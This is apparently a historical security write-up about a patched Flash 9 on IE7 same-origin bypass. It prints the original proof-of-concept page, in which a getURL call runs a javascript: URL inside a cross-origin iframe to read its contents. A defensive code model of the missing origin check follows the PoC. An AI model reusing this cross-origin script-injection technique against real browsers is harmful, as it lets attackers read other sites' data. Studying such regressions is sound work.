I had previously reported a UXSS using Flash’s getURL with the POST method. When Flash 9 shipped, I checked whether the GET method variant — which had been fixed in Flash 6 through 8 — was still blocked. It wasn’t. Flash 9 running in IE7 would execute a javascript: URL supplied to getURL inside an iframe named as the target, even if that iframe was loaded from a completely different origin. This was a regression: an old hole that came back.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>xDomain using getURL from Flash with GET Method</title></head>
<body>
<center>
<h1>xDom_IE7_Flash9GetURL<font color="red">GET</font>Method</h1>
</center>
<font face="Verdana" size="2">
<hr />
<u>Very Important</u>: I already reported a similar bug [09/11/2006:WOOBR bug #957315] using the POST method. But this "new" GET method is very important, and here's why: <br /><br />
Flash 4.x and 5.x ---> Vulnerable to the GET Method. I think (not sure) this one was public.<br /><br />
Flash 6.x, 7.x and 8.x ---> Fixed the GET Method, but we (MS) found a variation using the POST Method. I don't know if we finally reported it to Adobe.<br /><br />
Flash 9.x ---> (With IE7 ONLY) Vulnerable -again- to the GET Method. So guys, here's an old open hole that came back from death. I think we should fix it before any outsider finds out. It's an easy-to-find bug.<br /><br />
<hr />
<center>

xDomain using getURL from Flash <U>with GET Method</U>. Works on <b>IE7 with Flash 9.x</b>. We have an IFRAME called "ifr" and a .swf file that does this:<BR><BR>
Usage: getURL (URL, TARGET, METHOD)<BR>
<B>getURL("javascript:alert(ifr.document.body.innerHTML)", "ifr", "GET");</B><BR><BR>
So the javascript URL works inside an IFRAME that is on a different domain. :(<BR><BR>
</font>

<iframe name="ifr" width="500" height="300" src="http://www.google.com/"></iframe>
<br />
<object ID="daFlash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="200" height="200">
<param name="movie" value="xomaingetclick.swf"/>
</object>

</center>
</body>
</html>

Flash’s getURL(url, target, method) function was designed to navigate a named frame to a URL. When the method is "GET" and the URL is a javascript: URI, Flash 9 in IE7 would evaluate that JavaScript in the security context of the named target frame — in this case "ifr", which is loaded from google.com. This bypasses the same-origin policy completely: the attacker’s SWF, hosted on one domain, can read and manipulate the DOM of an iframe on any other domain. Flash 6 through 8 had patched the GET variant, but Flash 9 reintroduced it, making this a textbook security regression.
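As an added illustration (not part of the original report or of Flash itself), here is a JavaScript model of the check a plugin or browser must apply before honouring a getURL-style navigation of a named frame: ordinary URLs may replace a child frame's document, but a javascript: URL may only run when the initiator already shares the target document's origin. The host names are constructed placeholders.

```javascript
// Added example (not from the original report): a model of the same-origin
// check that a plugin or browser must apply before honouring a getURL-style
// navigation of a named frame. Flash 9 on IE7 skipped it for the GET variant.

// True when the URL's scheme is javascript:, after stripping the leading
// whitespace and control characters that URL parsers ignore.
function isJavascriptUrl(url) {
  return /^javascript:/i.test(String(url).replace(/^[\s\u0000-\u001f]+/, ""));
}

// Origin tuple (scheme, host, port) as a string; "null" for opaque origins.
function originOf(url) {
  try {
    return new URL(url).origin;
  } catch (e) {
    return "null";
  }
}

// May content at initiatorUrl navigate a child frame whose current document
// is targetUrl to navUrl?
//  - An ordinary URL only replaces the frame's document and runs nothing in
//    the old document's context, so a page may do that to its own frames.
//  - A javascript: URL executes in the target document's origin, so it is
//    allowed only when the initiator already has that origin.
function mayNavigateNamedFrame(initiatorUrl, targetUrl, navUrl) {
  if (!isJavascriptUrl(navUrl)) return true;
  const initiator = originOf(initiatorUrl);
  return initiator !== "null" && initiator === originOf(targetUrl);
}

// Constructed scenario mirroring the PoC above: the page embedding the SWF is
// on a placeholder host, frame "ifr" shows google.com, and getURL is called
// with the javascript: URL from the report.
const SWF_PAGE = "http://swf-host.invalid/xdom.html"; // placeholder host
const IFRAME_DOC = "http://www.google.com/";
const PAYLOAD = "javascript:alert(ifr.document.body.innerHTML)";

// A correct implementation refuses the cross-origin javascript: navigation.
function pocScenarioBlocked() {
  return !mayNavigateNamedFrame(SWF_PAGE, IFRAME_DOC, PAYLOAD);
}

console.log("cross-origin javascript: URL blocked:", pocScenarioBlocked());
```

The fixed Flash 6 through 8 behaviour corresponds to the function returning false for the PoC scenario; the Flash 9 on IE7 regression is equivalent to skipping the javascript: branch entirely.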

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.